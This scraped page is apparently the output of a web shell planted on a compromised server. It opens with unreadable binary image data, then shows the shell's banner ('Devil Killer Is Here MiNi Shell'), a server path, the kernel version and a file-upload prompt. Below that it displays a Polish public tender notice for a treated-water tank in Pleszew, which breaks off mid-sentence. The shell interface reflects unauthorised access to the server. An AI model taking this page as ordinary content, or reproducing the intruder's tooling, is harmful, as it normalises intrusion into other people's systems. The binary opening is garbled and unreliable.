JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250414/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250414/0018947401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Budowa zbiornika wody uzdatnionej nr 3”<br/>w ramach zadania: „Budowa zbiorników na wodę uzdatnioną w m. Pleszew” w ramach programu FENX.02.05-IW.01-001/23, ... do spożycia w gminie Pleszew” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Przedsiębiorstwo Komunalne Spółka z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 250423184</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Polna 71</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pleszew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@pkpleszew.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pkpleszew.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Budowa zbiornika wody uzdatnionej nr 3”<br/>w ramach zadania: „Budowa zbiorników na wodę uzdatnioną w m. Pleszew” w ramach programu FENX.02.05-IW.01-001/23, ... do spożycia w gminie Pleszew” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e946370a-cd69-4409-878d-7d15e0dcc602</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00189474</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zgłoszono do programu FENX.02.05-IW.01-001/23, nr wniosku: FENX.02.05-IW.01-0078/24 „Poprawa jakości i ograniczenie strat wody przeznaczonej do spożycia w gminie Pleszew” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-e946370a-cd69-4409-878d-7d15e0dcc602 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">5.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na Platformie eZamówienia. Szczegółowe informacje na temat zakładania konta, zasady i warunki korzystania z Platformy eZamówienia określa regulamin dostępny pod adresem: https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu, oraz informacje zamieszczone w zakładce „Centrum Pomocy” – zawierające interaktywne instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegółowo opisano w załączniku nr 9 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">7/ZP/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Budowa zbiornika wody uzdatnionej nr 3” w ramach zadania: „Budowa zbiorników na wodę uzdatnioną w m. Pleszew” w ramach programu FENX.02.05-IW.01-001/23, nr wniosku: FENX.02.05-IW.01-0078/24 „Poprawa jakości i ograniczenie strat wody przeznaczonej do spożycia w gminie Pleszew”<br/>1) Przedmiotem zamówienia jest budowa zbiornika wody uzdatnionej nr 3 wraz z infrastrukturą szczegółowo opisanego w dokumentacji technicznej, kosztorysie zerowym, przedmiarze robót, STWiOR i BIOZ. W szczególności:<br/>a)	Zamawiający informuje, że na działce nr 3705/2 znajdują się również 2 inne place budowy Wykonawców wybranych w innych postępowaniach przetargowych dla zadań pn. „Budowa budynku warsztatowo - magazynowego” oraz „Budowa budynku Centralnej Stacji Wodociągowej”. Zakresy tych trzech zadań będą się nakładać w jednym terminie<br/>b)	Wykonawca robót będzie współdzielił plac budowy tj. wydzielony obszar działki nr. 3705/2 z Wykonawcą zadań: Budowa Budynku Centralnej Stacji Wodociągowej oraz Budowa budynku warsztatowo - magazynowego. Jednocześnie wykonawca budynku CSW w zakresie swojego zadania w obszarze zbiornika wykona w uzgodnieniu z Wykonawcą zbiornika infrastrukturę między obiektową tj. rurociągi zasilające zbiorniki, rurociągi zasilające pompownie, kanalizacje przelewu i spustu oraz przebudowę sieci wodociągowej zasilające miejscowość Lenartowice. UWAGA – wymagana wizja lokalna pkt.20 SWZ. Patrz mapa PZT 2.<br/>c)	Wykonawca robót w pierwszej kolejności przed rozpoczęciem niwelacji terenu - robót ziemnych oraz po wcześniejszym poinformowaniu i uzgodnieniu terminu z Zakładem Wodociągów i Kanalizacji wykona wykopy kontrolne w celu potwierdzenia lokalizacji oraz zagłębienia odcinka istniejącej sieci wodociągowej DN 300 podlegającej przebudowie wg załącznika pn. „Mapa kolizji”,<br/>d)	Termin i sposób przebudowy kolizji zbiornika wody uzdatnionej numer 3 z istniejącym rurociągiem DN 300 zasilającym istniejące zbiorniki czystej wody zostanie bezwzględnie uzgodniony i zaakceptowany przez Nadzór Budowy oraz Zakład Wodociągów i Kanalizacji.<br/>e)	Przed odbiorem końcowym rozruchy zbiornika powinny odbywać się z nowo wybudowanej pompowni oraz infrastruktury między obiektowej którą realizuje wykonawca budynku CSW.<br/>f)	wykonanie wpięcia do magistrali<br/>g)	budowa sieci/przyłączy między obiektowych wynikających z nowych uwarunkowań technicznych,<br/>h)	budowa instalacji elektrycznej i AKPiA,<br/>i)	Zapewnienie pełnej obsługi geodezyjnej budowy: wytyczenie robót w terenie, ewentualne wskazanie granic,<br/>j)	wszelkie naprawy urządzeń nad i podziemnych uszkodzonych podczas wykonywania robót,<br/>k)	oznakowanie i oświetlenie budowy<br/>l)	zatrudnienie kierownika budowy,<br/>m)	powiadomienie odpowiednich organów (w tym instytucji dokonujących uzgodnień dokumentacji projektowej) o przystąpieniu do wykonywania robót budowlanych,<br/>n)	zapewnienie ciągłości dostawy wody (dopuszczalny nieprzekraczalny czas trwania przerwy w dostawie wody nie może przekroczyć 6 godzin). Prace będą prowadzone na obiekcie czynnym, dlatego prace należy wykonywać tak, by umożliwić w sposób ciągły dostawę wody do odbiorców.<br/>o)	przeprowadzenie wszelkich prób, sprawdzeń i odbiorów, przewidywanych warunkami technicznymi wykonania i odbioru robót budowlano - montażowych i instalacyjnych,<br/>p)	dokonanie uzgodnień, uzyskanie wszelkich opinii niezbędnych do wykonania przedmiotu umowy i przekazania go do użytku (uzyskanie pozwolenia na użytkowanie),<br/>q)	zagospodarowanie odpadów.<br/>2) Zestawienie wymiarów gabarytowych zbiornika retencyjnego wody uzdatnionej nr 3:<br/>-	Średnica 29,90 m<br/>-	Wysokość max. 4,40 m<br/>3)	Zestawienie powierzchni zbiornika retencyjnego wody uzdatnionej nr 3:<br/>-	Powierzchnia zabudowy 701,80 m2<br/>-	Powierzchnia całkowita 701,80 m2<br/>-	Pojemność całkowita 4004,21 m3<br/><br/>4) Fundamenty<br/>Projektowany obiekt posadowić za pomocą fundamentu bezpośredniego w postaci płyty żelbetowej. Poziom posadowienia podano w dokumentacji rysunkowej. POZ.PŁ.1 – PŁYTA DENNA (1 szt.) R = 15,05m, h = 0,5M, beton C30/37 W8, klasa ekspozycji XC2. Zbrojenie główne: siatka z prętów ∅16, o oczkach 15x15cm. Zbrojenie główne: B500B. Strzemiona: RB500B. Dokładne schematy zbrojenia pokazano na rysunkach technicznych.<br/>5)	Zewnętrzne ściany zbiornika<br/>Zaprojektowano w konstrukcji żelbetowej. Średnica zbiornika D = 29,70m, ściany gr. 35cm, wysokość ścian h = 6,30m, wykonane z betonu klasy C30/37 W8, klasa ekspozycji: XA1. Zbrojenie główne ścian: siatka z prętów ∅16, o oczkach 15x15cm. Zbrojenie główne: B500B. Strzemiona: RB500B<br/>6) Wewnętrzna ściana zbiornika<br/>Zaprojektowano w konstrukcji żelbetowej, gr. 35cm, beton C3037 W8, klasa ekspozycji XA1. Zbrojenie główne: siatka z prętów ∅16, o oczkach 15x15cm. Zbrojenie główne: B500B. Strzemiona: RB500B<br/>7) Pilastry<br/>Zaprojektowano w konstrukcji żelbetowej, gr. 35cm, beton C30/37 W8. Zbrojenie główne: siatka z prętów ∅16, o oczkach 15x15cm; zbrojenie główne: B500B. Strzemiona: RB500B<br/>UWAGA!<br/>Gabaryty elementów zamieszczono w dokumentacji rysunkowej. Dozbrojenie otworów oraz zagęszczenie zbrojenia zgodnie z dokumentacją rysunkową.<br/>8) Przykrycie zbiornika<br/>Zaprojektowano przykrycie zbiornika z płyty żelbetowej, gr. 45cm, beton C30/37 W8, klasa ekspozycji XA1. Średnica przykrycia D = 29,70m. Zbrojenie główne: siatka z prętów ∅16, o oczkach 15x15cm; Zbrojenie główne: B500B. Strzemiona: RB500B. Dokładne schematy zbrojenia pokazano na rysunkach technicznych.<br/>9) Izolacje przeciwwilgociowe, termiczne<br/>a) Izolacja przeciwwilgociowa/ przeciwwodna:<br/>-	Izolacja pionowa ścian fundamentowych (do min. 30 cm ponad powierzchnie terenu), z papy samoprzylepnej wraz z gruntowaniem podłoża x 2 gr. min. 2,5 mm na osnowie z włókniny poliestrowej z asfaltem modyfikowanym elastromerami<br/>-	Izolacja pozioma ( podłogi na gruncie ) z papy kauczukowo – żywiczno – asfaltowa wykonana z bariery anty radonowej, na osnowie z włókniny poliestrowej o gramaturze 250 g/m2 napawanej aluminium, z asfaltem modyfikowanym elastromerami grubość min. 4,0 mm.<br/>b) Izolacja termiczna:<br/>-	Ściany podziemne oraz ściany nadziemne w strefie cokołu termoizolacja z płyt gr. 10 cm EPS HYDRO 150-038, współczynnik przewodzenia ciepła λmax ≤ 0,038 W/m·K;<br/>c) Ściany zewnętrzne termoizolacja:<br/>-	Termoizolacja z płyt gr. 10 cm EPS 070-040 , współczynnik przewodzenia ciepła λmax ≤ 0,040 W/m·K;<br/>d) Powłoka uszczelniająca elastyczna do kontaktu z wodą spożywczą<br/>e) Izolacja termiczna dachu:<br/>-	Dach termoizolacja z płyt EPS – 150 spadkowy gr. 15-25 cm, o maksymalnym współczynniku przewodzenia ciepła λmax ≤ 0,036 W/m·K;<br/>10) Pokrycie<br/>a) Projektuję się pokrycie dachu dwoma warstwami papy:<br/>-	Papa wierzchniego krycia na osnowie z włókniny poliestrowej o gramaturze 250g/m2 z obustronna powłoką z masy asfaltowej: z asfaltu modyfikowanego SBS z wypełniaczem mineralnym grubość min. 5,2 mm.<br/>-	Papa podkładowa wykonana z dwóch warstw masy asfaltowej modyfikowanej SBS z wypełniaczem mineralnym grubość min. 4,0mm<br/>11) Instalacje wewnętrzne<br/>-	zasilanie zbiornika rurą PE 100 SDR 17 PN 10 dn 315 – do zbiornika; w zbiorniku rura ze stali nierdzewnej Ø323,9x3,0 mm;<br/>-	zasilanie zestawu pompowego rurą PE 100 SDR 17 PN 10 dn 315 – do zbiornika; w zbiorniku rura ze stali nierdzewnej Ø323,9x3,0 mm;<br/>-	spust ze zbiornika retencyjnego rurą PE 100 SDR 17 PN 10 dn 315 – do zbiornika; w zbiorniku rura ze stali nierdzewnej Ø323,9x3,0 mm;<br/>-	przelew ze zbiornika retencyjnego rurą PE 100 SDR 17 PN 10 dn 315 – do zbiornika; w zbiorniku rura ze stali nierdzewnej Ø323,9x3,0 mm;<br/>-	przejście rur należy uszczelnić 2x kołnierzem łańcuchowym ŁU-6-17 ogniw + KPW.<br/>-	wentylator dachowy chemoodporny ∅ 450 mm z regulacją EC o parametrach:<br/>-	system napowietrzania zbiornika wyposażony w filtr wlotowy Hepa, filtr przeciwbakteryjny, kratki ochronne.<br/>12) Prace wykończeniowe zewnętrzne<br/>-	rynny ∅150, rury spustowe ∅110 z blachy stalowej, gr. min. 0,55mm, ocynkowanej dwustronnie, pokrytej ochronną powłoką organiczną;<br/>-	obróbki blacharskie stalowe ocynkowane o gr. min. 0,55mm (275g cynku na m2) i powlekane powłoką poliestrową o grubości 25mμ zamontowane w sposób stabilny i zapewniający odprowadzenie wody poza powierzchnie obiektu. Obróbki należy ukształtować tak, aby ich krawędź oddalona była od docelowej powierzchni o ok. 4cm. Obróbki blacharskie należy wykonać w sposób zapewniający we wszystkich fazach prac należytą ochronę powierzchni przed wodami opadowymi i spływającymi;<br/>-	drabina zewnętrzna i wewnętrzna wykonana ze stali OH18N9.<br/>-	barierka ochronna ze stali OH18N9:<br/>-	balustrada na zbiorniku wykonana ze stali OH18N9<br/>-	opaska z kostki betonowej z kostki betonowej brukowej, barwa szara grubości 6 cm. Obłożone po obwodzie krawężnikiem 8x30 cm na ławie betonowej z betonu C16/20. Na podsypce cementowo-wapiennej gr. 4 cm i podbudowie z piasku zagęszczonego do Is=0,98 grubości 15 cm. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45232430-5 - Roboty w zakresie uzdatniania wody</p> <p class="mb-0">45240000-1 - Budowa obiektów inżynierii wodnej</p> <p class="mb-0">45247270-3 - Budowa zbiorników</p> <p class="mb-0">45262210-6 - Fundamentowanie</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-02-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Szczegółowo opisano w pkt. 17 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie,<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie,<br/>3) sytuacji ekonomicznej lub finansowej - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie,<br/>a)	posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 2.000.000,00 PLN (słownie: dwa miliony złotych 00/100), <br/>b)	są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia, przy czym kwota ubezpieczenia jest nie mniejsza niż 2.000.000,00 PLN (słownie: dwa miliony złotych 00/100).<br/>4) zdolności technicznej lub zawodowej<br/>4.1)	dysponują osobami zdolnymi do realizacji zamówienia, tj.:<br/>a)	jedną osobą, która będzie uczestniczyć w wykonaniu zamówienia, tj. pełnić funkcję Kierownika Budowy / Kierownika robót konstrukcyjno-budowlanych, posiadającą ważne uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie: kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno – budowlanej, potwierdzone decyzjami, o których mowa w art. 12 ust. 2 (z uwzględnieniem art. 104) ustawy z dnia 7 lipca 1994 roku Prawo budowlane (t.j. Dz. U. z 2024 r. poz. 725 z późn. zm.) lub inne ważne uprawnienia do kierowania robotami budowlanymi bez ograniczeń w tej specjalności, wydane na podstawie wcześniej obowiązujących przepisów. Osoba ta kierowała robotami jako kierownik budowy lub robót w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, na co najmniej 1 prawidłowo zakończoną i oddaną do eksploatacji robotą budowlaną polegającą na budowie co najmniej 1 żelbetowego zbiornika wody uzdatnionej o pojemności min. 1 000 m3 wraz z niezbędnym oprzyrządowaniem, podłączeniem do sieci wodociągowych.<br/>b)	jedną osobą, która będzie uczestniczyć w wykonaniu zamówienia, tj. posiadającym uprawnienia do kierowania robotami budowlanymi w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych - bez ograniczeń. Osoba ta kierowała robotami w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, na co najmniej 1 prawidłowo zakończoną i oddaną do eksploatacji robotą budowlaną polegającą na budowie co najmniej 1 żelbetowego zbiornika wody uzdatnionej o pojemności min. 1.000 m3 wraz z niezbędnym oprzyrządowaniem, podłączeniem do sieci wodociągowych.<br/>c) jedną osobą, która będzie uczestniczyć w wykonaniu zamówienia, tj. posiadającą ważne uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie: kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, potwierdzone decyzjami, o których mowa w art. 12 ust. 2 (z uwzględnieniem art. 104) ustawy z dnia 7 lipca 1994 roku Prawo budowlane (Dz. U. z 2020 r., poz. 1333 z późniejszymi zmianami) lub inne ważne uprawnienia do kierowania robotami budowlanymi, wydane na podstawie wcześniej obowiązujących przepisów*, potwierdzone decyzjami, o których mowa w art. 12 ust. 